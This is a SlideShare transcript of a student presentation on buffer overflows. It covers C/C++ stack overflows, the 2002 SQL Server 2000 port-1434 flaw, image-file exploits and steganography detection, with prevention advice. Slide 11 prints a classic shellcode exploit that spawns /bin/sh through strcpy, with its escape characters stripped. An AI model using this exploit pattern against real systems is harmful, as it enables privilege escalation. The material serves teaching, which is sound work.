Your SlideShare is downloading. ×
  • Like
Buffer Overflow: A Short Study
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Now you can save presentations on your phone or tablet

Available for both IPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Buffer Overflow: A Short Study

  • 1,407 views
Published

 

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
1,407
On SlideShare
0
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
53
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Buffer overflow: a short study
    Jonathan Hutchison
    Robert Lee
    Connor Mahoney
    Caleb Wherry
  • 2. Overview
  • Basic Concepts
    Buffer
    Stack Memory
    Heap Memory
    Buffer Overflow
    C/C++
    SQL
    Steganogrophy
  • 9. C/C++ Buffer Overflow Vulnerabilities
    C/C++ On Older Linux Machines
    Easiest to exploit.
    Few protections against segmentation faults.
    Many simple programs can cause serious damage on these machines.
    Code Libraries
    Not trusted libraries.
    Unstable functions.
    Unsecured error checking.
  • 10. C/C++ Buffer Overflow Vulnerabilities (cont.)
    Exploitation Using Shell Code
    Shell Code
    Unstable C commands
    C Example:
    Use of shell code to switch the user to “root”
    Use of “strcpy()” function in C to cause a buffer overflow.
    Dangerous for someone running an unsecured Linux machine.
  • 11. #include <stdio.h>
    #include <string.h>
    char shellcode[] =
    "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
    "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
    "x80xe8xdcxffxffxff/bin/sh"; // Shell code that will be executed once the buffer is // over flown. It allows us to change the stance of our // login to “root”.
    char large_string[128];
    int main(int argc, char *argv[])
    {
    char buffer[96]; // buffer to overflow
    int i;
    long *long_ptr = (long *)large_string;
     
    for (i = 0; i < 32; i++) // These for loops take the shell code and // translate it into the large string and then // in turn puts a full buffer into each // pointer value of the large_string
    *(long_ptr + i) = (int)buffer;
    for (i = 0; i < (int)strlen(shellcode); i++)
    large_string[i] = shellcode[i];
    strcpy(buffer, large_string); // The string copy function in C should be used // with the utmost caution. This is where the code // blows up and causes the program to execute the // rest of the shell code on the command line.
    return 0;
    }
  • 12. Prevention of Buffer Overflow In C/C++
    Use only trusted libraries when writing code.
    Use updated software that helps prevent overflow.
    Make sure your code checks the user input.
    Use trusted programs, don’t use untested software.
  • 13. Prevention of Buffer Overflow In C/C++ (cont.)
    Administrative Point of View
    Don’t compromise quality for quantity.
    Don’t rush deadlines.
    Make sure your programmers are happy and comfortable. Working conditions matter.
    Error checking for all inputs is a must.
    Don’t cut corners.
    Use software such as Flawfinder and Viega’s RATS for possible code problems.
  • 14. Buffer Overflow In SQL
    SQL – Structured Query Language
    Popular query language for relational database management.
    In 2002, a Buffer Overflow vulnerability was discovered in Microsoft SQL Server 2000.
    Both Stack based and Heap based attacks.
    Attacks carried out through UDP port 1434
    SQL Monitor Port
    Commonly used by legitimate clients attempting to connect.
    Single byte packet, set to 0x02
  • 15. Stack Based Buffer Overflow Attack
    First byte set to 0x04
    Instructs SQL monitor to open registry key
    If followed by a large number of bytes, stack based buffer is overflowed.
    Return address overwritten
    Redirects SQL server process to execute code of attackers choice.
  • 16. Heap Based Buffer Overflow Attack
    Carried out using similar technique
    First byte set to 0x08 followed by a message with a certain format.
    Formatted properly, attack avoids access violation errors before heap is overflowed.
    Vulnerability in SQL server 2000 code
    Return values not validated
    Unhandled exceptions
    Current process fails, resulting effectively in a denial of service attack.
  • 17. Buffer Overflow In Images
    iPhone
    www.jailbreakme.com
    Alter file header in TIFF image
    New memory pointer
    Crashes browser
    Unlocks file system
  • 18. Other exploits
    Windows
    JPEG (GDI+ API)
    BMP
    GIF
    Linux
    PNG
    Macintosh, iPhone, & PSP
    TIFF
  • 19. Traditional Stegenogrophy
    Image from a laser printer under 10x magnification
  • 20. Traditional Steganogrophy (cont)
  • 21. Digital Steganogrophy
    How it works
    Each pixel has 24 bits for 3 colors (255 shades/color)
    Change 1 or 2 color bits every pixel
    Adds up quickly
    Bits can be encoded & decoded with a program
    No quality or size difference
    Images
    Video
    Audio
  • 22. Detection and Prevention
    Compare with an original by checksum
    Check same color pixels for different values
    Statistical analysis
    Algorithm detection
    Compression & formatting
  • 23. Example
    Hidden image
    Original image